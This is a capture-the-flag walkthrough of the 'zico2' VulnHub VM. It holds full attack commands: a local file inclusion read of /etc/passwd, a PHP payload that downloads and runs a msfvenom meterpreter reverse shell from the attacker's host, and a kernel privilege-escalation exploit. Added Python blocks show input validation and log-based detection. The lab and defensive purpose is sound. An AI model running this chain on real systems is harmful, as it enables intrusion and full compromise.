Okay, let’s give an “intermediate” CTF a shot here. Not sure what makes it harder yet, but I’m excited to get going, so let’s do this!
This Boot2Root VM is “zico2”, available from VulnHub.
The goal of this CTF is to get root and read the flag file. This VM works without issue in VirtualBox 5. Have fun!
First, as usual, nmap.
root@kali:~# nmap -sV -T4 10.13.37.206 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-08 22:33 EST
Warning: 10.13.37.206 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.13.37.206
Host is up (0.00018s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.2.22 ((Ubuntu))
111/tcp   open  rpcbind    2-4 (RPC #100000)
53380/tcp open  status     1 (RPC #100024)
MAC Address: 08:00:27:98:69:CA (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1664.24 seconds
We’ll start with port 80. (I started a brute force ssh run in the background in the meantime, because you never know, but it came up with nothing.)
So let’s see what subdirectories gobuster comes up with.
root@kali:~# gobuster -u http://10.13.37.206 -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.13.37.206/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/LICENSE (Status: 200)
/css (Status: 301)
/dbadmin (Status: 301)
/img (Status: 301)
/index (Status: 200)
/js (Status: 301)
/package (Status: 200)
/tools (Status: 200)
/vendor (Status: 301)
/view (Status: 200)
=====================================================
First, the root, (http://10.13.37.206). Just the start of a site, nothing interesting… except…
So, if it’s not obvious to you, it looks like maybe we’ll be able to use view.php to view files on the server.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
Cool, that might end up being helpful. Plus now we have some system accounts.
Checking out the other subdirectories, nothing else looks too interesting until I hit http://10.13.37.206/dbadmin/. Inside there’s a test_db.php file, which gives us a login page for PHPLiteAdmin v1.9.3.
A quick Google search shows that the default password is “admin”, which isn’t changed as part of the initialization process. I’m guessing that since there are a few unfinished web frameworks here, the sys admin might not have completed setting everything up, so let’s try that. Although, who am I kidding, default passwords are always good to guess anyway.
It worked!
Looking through everything that’s here, there are a couple users (and their hashed passwords) in the test_users database, “info” table.
You can crack the passwords, they are “34kroot34” (for root), and “zico2215@” for zico. (Spoiler: I ended up not needing these, but maybe you’ll find them useful in finding another way in.)
Okay, let’s see if this has any known vulnerabilities.
It looks like it does! Long story short, if you create a database, you can specify the extension you want to use for it, and it will save that database in “/usr/databases”. So if you create a database with the “.php” extension, then you can create a table in that database with one text column, with a default value that is some valid php code, and when you view that “page” in a browser window, it will execute the PHP code. I’m not going to go into a ton of detail here, that’s what Google is for. 🙂
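The two missing checks that make this chain work are the ones a defender would add: the include parameter of view.php is used as a raw path, and the database name is allowed to carry any extension. The following is an added example written for this post, not the VM’s view.php or PHPLiteAdmin’s own code; it expresses both checks in Python so they can be run and tested. The document root (/var/www), the page allowlist (taken from the gobuster listing above) and the data-file extension list are assumptions.

```python
import os

# Added example, not the VM's view.php or PHPLiteAdmin's own code: the two
# input checks whose absence the walkthrough relies on, written as plain
# Python so they can be run and tested. Paths and names are assumptions.

WEB_ROOT = "/var/www"  # assumed document root of the site
# Page names taken from the gobuster listing; anything else is refused.
ALLOWED_PAGES = {"index", "tools", "package", "view"}
# Only data-file extensions may be used for a newly created SQLite database.
ALLOWED_DB_EXTENSIONS = {".db", ".sqlite", ".sqlite3"}


def is_inside(root: str, path: str) -> bool:
    """Lexical containment check: is `path` under `root` once '..' is resolved?

    normpath does not follow symlinks; for files that exist, apply
    os.path.realpath to both sides before comparing.
    """
    root_n = os.path.normpath(root)
    path_n = os.path.normpath(path)
    return os.path.commonpath([root_n, path_n]) == root_n


def resolve_page(page: str, web_root: str = WEB_ROOT):
    """Map a user-supplied `page` parameter to a file, or return None.

    The allowlist alone stops "../../../../etc/passwd" and
    "../../../../usr/databases/rshell.php"; the containment check is a second
    line of defence in case the allowlist is ever loosened.
    """
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.normpath(os.path.join(web_root, page + ".php"))
    if not is_inside(web_root, candidate):
        return None
    return candidate


def is_safe_db_filename(name: str) -> bool:
    """Accept a database file name only as a bare name with a data extension.

    A directory component, a base name outside [A-Za-z0-9_-], or an extension
    such as .php is refused, so a database can never become an includable script.
    """
    if os.path.basename(name) != name:
        return False
    stem, ext = os.path.splitext(name)
    if not stem or not all(c.isalnum() or c in "_-" for c in stem):
        return False
    return ext.lower() in ALLOWED_DB_EXTENSIONS


if __name__ == "__main__":
    for p in ("tools", "../../../../etc/passwd", "../../../../usr/databases/rshell.php"):
        print(f"page={p!r:45} -> {resolve_page(p)}")
    for n in ("test_users.db", "rshell.php", "../x.db"):
        print(f"db={n!r:20} -> {'ok' if is_safe_db_filename(n) else 'refused'}")
```

With both checks in place, the passwd read above fails at the allowlist, and a database saved as rshell.php is refused before it is ever written, so there is nothing for view.php to include.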
So I figured what I would do is the following:
- Create reverse shell executable to point back to my kali
- Share the executable via a python http server
- Start up a meterpreter listener
- Create some PHP code to download the executable, make it executable, and execute it to open the reverse shell
- Profit?
Step 1, create the reverse shell executable.
root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.37.237 LPORT=443 -f elf -o /tmp/rshell
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: /tmp/rshell
Run the http server to host the file for download.
root@kali:/tmp# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
Start meterpreter reverse TCP handler.
root@kali:/tmp# systemctl start postgresql
root@kali:/tmp# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.13.37.237
LHOST => 10.13.37.237
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.13.37.237:443
Create the aforementioned database/table in PHPLiteAdmin with the following default value:
'<?php system("cd /tmp; wget http://10.13.37.237:8000/rshell; chmod 777 rshell; ./rshell"); ?>'
And then navigate to the following URL to run the PHP:
http://10.13.37.206/view.php?page=../../../../usr/databases/rshell.php
Meterpreter should now look something like this. You’ll have to hit enter, and then start the interaction with the session that was opened.
msf exploit(handler) > [*] Sending stage (847604 bytes) to 10.13.37.206
[*] Meterpreter session 1 opened (10.13.37.237:443 -> 10.13.37.206:54907) at 2017-11-09 06:03:40 -0500
<hit enter>
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
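Everything up to this point leaves a trail in the web server’s access log: the passwd read through view.php earlier, and the include of a .php file from outside the web root that triggers the callback. Below is an added detection example written for this post, not anything from the VM or from Metasploit. It parses Apache combined-format lines and flags include-style parameters that contain traversal, an absolute path, or a .php target; the log lines are constructed to mirror the requests in this walkthrough, and the parameter name `page` is assumed from view.php.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined format, not taken from the VM.
# The first two are benign; the last three mirror the requests in this post.
SAMPLE_LOG = """\
10.13.37.237 - - [09/Nov/2017:06:01:02 -0500] "GET /index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.13.37.237 - - [09/Nov/2017:06:01:40 -0500] "GET /view.php?page=tools HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.13.37.237 - - [09/Nov/2017:06:02:15 -0500] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1733 "-" "Mozilla/5.0"
10.13.37.237 - - [09/Nov/2017:06:02:50 -0500] "GET /view.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1733 "-" "Mozilla/5.0"
10.13.37.237 - - [09/Nov/2017:06:03:30 -0500] "GET /view.php?page=../../../../usr/databases/rshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Query parameters that the application uses as a file reference (assumed).
INCLUDE_PARAMS = {"page"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2e%2e%2f and double-encoded forms read as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> list:
    """Return sorted reasons why the request target looks like a file-include abuse."""
    reasons = set()
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in INCLUDE_PARAMS:
            continue
        v = fully_decode(value).replace("\\", "/")
        if "../" in v:
            reasons.add("traversal")
        elif v.startswith("/"):
            reasons.add("absolute-path")
        if v.lower().endswith(".php"):
            # A .php target under an include parameter: a planted script
            # (such as a database saved with a .php name) being executed.
            reasons.add("php-include")
    return sorted(reasons)


def scan_log(text: str) -> list:
    """Parse each access-log line and keep those with at least one reason."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['status']} {','.join(f['reasons'])} {f['target']}")
```

Run over a real access log, a `php-include` hit with a 200 status right after a burst of `traversal` hits from the same address is the moment the web server started running someone else’s code; an outbound connection from www-data on port 443 or 8000 at the same timestamp confirms it.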
Start up a shell, and then use Python to get bash running. Because I like bash better. Then we figure out what version of the kernel we’re running, maybe we can find a privilege escalation exploit.
meterpreter > shell
Process 4407 created.
Channel 7 created.
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@zico:/home/zico/wordpress$ cd /tmp
cd /tmp
www-data@zico:/tmp$ uname -a
uname -a
Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Search exploit-db.com for the kernel version, and sure enough, there’s an exploit: “vnik”. Download it, compile it, and run it, as per the instructions in the source.
www-data@zico:/tmp$ wget https://www.exploit-db.com/raw/33589/ -O vnik.c
wget https://www.exploit-db.com/raw/33589/ -O vnik.c
--2017-11-10 03:09:10--  https://www.exploit-db.com/raw/33589/
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3664 (3.6K)
Saving to: `vnik.c'

100%[======================================>] 3,664       --.-K/s   in 0s

2017-11-10 03:09:10 (313 MB/s) - `vnik.c' saved [3664/3664]

www-data@zico:/tmp$ gcc vnik.c -O2 -o vnik
gcc vnik.c -O2 -o vnik
www-data@zico:/tmp$ chmod 777 vnik
chmod 777 vnik
www-data@zico:/tmp$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@zico:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@zico:/tmp# ls /root
ls /root
flag.txt
root@zico:/tmp# cat /root/flag.txt
cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
And done! That wasn’t too hard! I did enjoy it though.
Until next time!